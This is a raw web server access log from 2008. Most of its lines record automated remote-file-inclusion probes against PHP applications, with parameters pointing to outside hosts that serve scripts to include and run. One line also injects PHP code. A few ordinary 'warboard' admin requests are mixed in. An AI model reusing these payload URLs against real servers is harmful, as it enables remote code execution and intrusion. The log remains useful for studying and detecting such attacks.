212.227.101.118 - - [23/Apr/2008:13:18:40 -0700] "GET //errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:13:18:41 -0700] "GET /logs//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.11 - - [23/Apr/2008:13:18:50 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [23/Apr/2008:13:18:51 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [23/Apr/2008:13:18:51 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:18:52 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.148.207 - - [23/Apr/2008:13:18:53 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.148.207 - - [23/Apr/2008:13:18:54 -0700] "GET /convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.148.207 - - [23/Apr/2008:13:18:54 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:19:05 -0700] "GET /logs/access_080108.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:13:19:10 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.11 - - [23/Apr/2008:13:19:11 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:13:19:12 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:13:19:12 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:13:19:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:13:19:19 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:13:19:22 -0700] "GET /logs/access.log//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.148.207 - - [23/Apr/2008:13:19:47 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:20:00 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:20:01 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:20:02 -0700] "GET /logs/access_080308.log//init_basic.php?GALLERY_BASEDIR=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:20:03 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:13:20:08 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:13:20:13 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:13:20:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:13:20:17 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:20:21 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:13:20:30 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:13:20:30 -0700] "GET /convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:13:20:30 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:13:20:31 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:20:41 -0700] "GET /logs/access_080320.log//atom.php5?page=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:20:41 -0700] "GET //atom.php5?page=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:20:42 -0700] "GET /logs//atom.php5?page=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:13:20:47 -0700] "GET //errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.94.38.182 - - [23/Apr/2008:13:20:50 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:20:51 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.94.38.182 - - [23/Apr/2008:13:20:51 -0700] "GET //citywriter/head.php?path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.94.38.182 - - [23/Apr/2008:13:20:52 -0700] "GET /logs//citywriter/head.php?path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:20:52 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:20:53 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.11.238.250 - - [23/Apr/2008:13:21:08 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.238.250 - - [23/Apr/2008:13:21:09 -0700] "GET /popup_window.php?site_isp_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:13:21:19 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:13:21:19 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:21:23 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:21:23 -0700] "GET //config/dbutil.bck.php?confdir=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:21:23 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:13:21:37 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:21:51 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.88.116.153 - - [23/Apr/2008:13:21:59 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
203.88.116.153 - - [23/Apr/2008:13:21:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
203.88.116.153 - - [23/Apr/2008:13:21:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:22:29 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:22:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:22:37 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:22:37 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:22:37 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.82.63 - - [23/Apr/2008:13:23:03 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:23:06 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.82.63 - - [23/Apr/2008:13:23:08 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.82.63 - - [23/Apr/2008:13:23:13 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:13:23:20 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:13:23:20 -0700] "GET /convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:13:23:21 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:13:23:22 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:13:23:31 -0700] "GET /logs/access_080215.log//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
88.165.38.69 - - [23/Apr/2008:13:23:42 -0700] "GET /logs/index.php?pagina=http://www.troop66nm.org/image/response1??? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.117.106.4 - - [23/Apr/2008:13:23:45 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.165.38.69 - - [23/Apr/2008:13:23:46 -0700] "GET /index.php?pagina=http://www.troop66nm.org/image/response1??? HTTP/1.0" 200 11590 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:23:49 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:23:49 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:23:50 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:13:23:58 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:13:24:03 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bpec-english.com/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
122.201.82.63 - - [23/Apr/2008:13:24:10 -0700] "GET /alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.82.63 - - [23/Apr/2008:13:24:14 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [23/Apr/2008:13:24:19 -0700] "GET /logs/access.log//errors.php?error=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [23/Apr/2008:13:24:20 -0700] "GET //errors.php?error=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:24:29 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 33247 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:24:41 -0700] "GET /logs/access_080315.log//atom.php5?page=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:24:55 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:25:04 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33028 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:13:25:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:25:27 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=614 HTTP/1.1" 200 7612 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:13:25:27 -0700] "GET /?CONFIG[MWCHAT_Libs]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:13:25:32 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "dmulk.com"
200.244.71.2 - - [23/Apr/2008:13:25:32 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:25:58 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=614 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=614" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:25:59 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=614&just_updated=1 HTTP/1.1" 200 7648 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=614" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:26:04 -0700] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=614&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:13:26:07 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:26:07 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:26:09 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33032 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:26:23 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:26:23 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:26:23 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.142.215.14 - - [23/Apr/2008:13:26:27 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:13:26:41 -0700] "GET /?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:27:03 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:27:06 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=606 HTTP/1.1" 200 7622 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:13:27:20 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:13:27:20 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:13:27:20 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.94.38.182 - - [23/Apr/2008:13:27:25 -0700] "GET /popup_window.php?site_isp_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:27:33 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=606 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=606" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [23/Apr/2008:13:27:33 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=606&just_updated=1 HTTP/1.1" 200 7655 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=data